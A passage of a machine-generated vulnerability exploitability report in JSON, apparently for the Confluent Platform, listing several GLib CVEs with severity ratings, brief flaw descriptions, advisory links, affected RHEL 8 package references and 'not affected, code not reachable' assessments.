          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58010",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses > instead of >=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58010"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58010"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-m7rp-473c-296x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3915"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58010.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58010"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58010"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58011",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A flaw was found in GLib. An out-of-bounds read of only 2 bytes can occur in the g_date_time_get_ymd function in the glib/gdatetime.c file when an invalid GDateTime object produced by the g_date_time_add_full function is processed. This flaw can corrupt the date output and potentially cause logic errors that may lead to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58011"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58011"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-8xmh-8wfg-9f6j"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3917"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/work_items/3917"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58011.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58011"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58011"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58012",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58012"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58012"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-vwg8-37h9-g38g"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3918"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58012.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58012"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58012"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58013",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.2,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58013"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58013"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
